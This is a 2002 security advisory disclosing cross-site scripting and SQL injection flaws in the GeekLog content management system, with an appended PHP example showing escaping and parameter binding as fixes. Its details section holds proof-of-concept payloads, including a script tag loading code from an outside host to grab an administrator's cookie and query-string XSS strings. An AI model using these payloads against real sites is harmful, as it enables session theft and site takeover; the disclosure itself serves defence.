+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A13 ----/----------/+
+/-----------\----- salper@olympos.org ---/-----------/+

Advisory Information
--------------------

Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)

Summary
-------

GeekLog is a web content management system suitable for running full-featured community sites. It supports article posting, threaded comments, event scheduling, and link management, and is built around a design philosophy that emphasizes ease of use.

I found these issues while testing the GeekLog system that was to be used at http://www.olympos.org, "Olympos Turkish Security Portal". Two different types of Cross Site Scripting issues, plus one SQL Injection vulnerability, were found in GeekLog.

Details
-------

1. When any user submits a new Calendar Event, the form is sent to the site admin for approval. The $url variable, which holds the data given in the "Link" section of the form, is not filtered for malicious code. So a malicious user may get the cookie of the site administrator and therefore "own" the site. This issue may also be exploited to run malicious code on the GeekLog site.

   Proof-of-concept Link input ($url):

   <script src="http://forum.olympos.org/f.js">Alper</script>

2. Maliciously crafted links from third party sites may allow Cross Site Scripting attacks via "index.php" and/or "comment.php". Two examples of this:

   /index.php?topic=<script>alert(document.cookie)</script>
   /comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article

3. The $pid variable is passed directly to SQL input. This makes it possible for attackers to launch SQL injection attacks.

   /comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

   As the "Magic Quotes" function of PHP escapes the quoting characters, this third issue might just cause "light" headaches, but if "Magic Quotes" is not active, the attacker may be able to get all the information about users from the SQL tables.

Solution
--------

The vendor replied and acted quickly. A patch or a new version addressing this issue will soon be available via CVS or FTP download from:

http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The GeekLog development team said that they will be cleaning the code of similar security issues to those mentioned above.

Credits
-------

Discovered on 31 May 2002 by Ahmet Sabri ALPER <salper@olympos.org>, ALPER Research Labs.

The ALPER Research Labs [ARL] workers are freelance security professionals and WhiteHat hackers. The ARL workers are available for hire for legal jobs. The ARL also supports the Open Software Community by detecting possible security issues in GPL or any other publicly licensed product.

References
----------

Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/
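The three issues in the Details section come down to two missing controls: HTML-escaping of request-derived strings before they are written into a page (issues 1 and 2, the $url, $topic and $title values), and type validation plus parameter binding for $pid before it reaches SQL (issue 3). The following is an added example written for this advisory, not GeekLog's own code; the table name gl_comments, its columns and the gl_* helper names are assumptions, and it uses PDO with an in-memory SQLite database so it runs without a MySQL server.

```php
<?php
// Added example, not GeekLog code. Table gl_comments and its columns
// (cid, title, comment) are assumed for illustration.

// Issues 1 and 2: every request-derived string ($url from the calendar
// form, $topic and $title from the query string) is untrusted and must be
// escaped where it is written into HTML. ENT_QUOTES also escapes ' and "
// so the value stays inert inside attributes, not just between tags.
function gl_html(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES, 'UTF-8');
}

// Issue 3: $pid is an identifier, so accept only a non-negative integer and
// bind it as a parameter instead of interpolating it into the query string.
// This does not rely on magic_quotes, which escapes quote characters only
// and does nothing for a bare numeric context such as "WHERE cid = $pid".
function gl_validate_pid($raw): ?int
{
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $pid === false ? null : $pid;
}

function gl_fetch_comment(PDO $db, $raw_pid): ?array
{
    $pid = gl_validate_pid($raw_pid);
    if ($pid === null) {
        return null;                      // malformed input: refuse, do not query
    }
    $stmt = $db->prepare('SELECT cid, title, comment FROM gl_comments WHERE cid = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Rendering: escape both request-derived and database-derived strings, since
// a stored value (issue 1's $url) is just as untrusted as a query parameter.
function gl_render_comment(array $row, string $topic): string
{
    return '<h2>' . gl_html($topic) . '</h2>'
         . '<h3>' . gl_html($row['title']) . '</h3>'
         . '<p>' . gl_html($row['comment']) . '</p>';
}

// Self-check on constructed inputs modelled on the advisory's examples.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gl_comments (cid INTEGER PRIMARY KEY, title TEXT, comment TEXT)');
$db->exec("INSERT INTO gl_comments VALUES (18, 'hello', 'first post')");

assert(gl_validate_pid('18') === 18);
assert(gl_validate_pid('18 foo') === null);      // non-integer input is rejected
assert(gl_fetch_comment($db, '18')['title'] === 'hello');
assert(gl_fetch_comment($db, 'foo') === null);

$topic = '<script>alert(document.cookie)</script>';  // constructed, from issue 2
$out = gl_render_comment(gl_fetch_comment($db, '18'), $topic);
assert(strpos($out, '<script>') === false);      // the tag is now literal text
echo $out, "\n";
```

The validation step rejects rather than "cleans" a bad $pid: an identifier that is not an integer has no legitimate meaning, so there is nothing to repair. Escaping is applied at output time, in one place, so that the same helper covers values whether they arrived through the query string or were stored earlier through the calendar form.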